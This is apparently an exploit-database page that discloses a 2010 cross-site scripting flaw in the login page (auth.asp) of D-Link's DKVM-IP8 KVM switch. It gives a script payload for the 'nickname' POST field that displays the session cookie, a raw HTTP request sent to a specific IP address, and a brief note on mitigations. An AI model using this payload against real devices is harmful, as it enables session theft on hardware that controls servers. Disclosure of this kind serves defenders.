header-logo
Suggest Exploit
vendor:
DKVM-IP8
by:
POPCORN
7,5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: DKVM-IP8
Affected Version From: 2282_dlinkA4_p8_20071213
Affected Version To: 2282_dlinkA4_p8_20071213
Patch Exists: N/A
Related CWE: N/A
CPE: //a:d_link:dkvm_ip8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Sp 2
2010

D-LINK DKVM-IP8 XSS Vulnerability

The POST variable nickname has been set to 1>">">"><script>alert(document.cookie)</script>

Mitigation:

Input validation, output encoding, and content security policies can be used to mitigate XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: D-LINK DKVM-IP8 XSS Vulnerability
# Date: 01-06-2010
# Author: POPCORN
# Software Link: http://www.dlink.ru/
# Version: 2282_dlinkA4_p8_20071213
# Tested on: Windows Sp 2
# Site : http://Hacking.ge
# Code :
POST http://site.com80/auth.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 212.58.116.80
Content-Length: 90
Connection: Close
Pragma: no-cache
Attack details
The POST variable nickname has been set to 1>">">

Navigation

Suggest Exploit

Services By CQR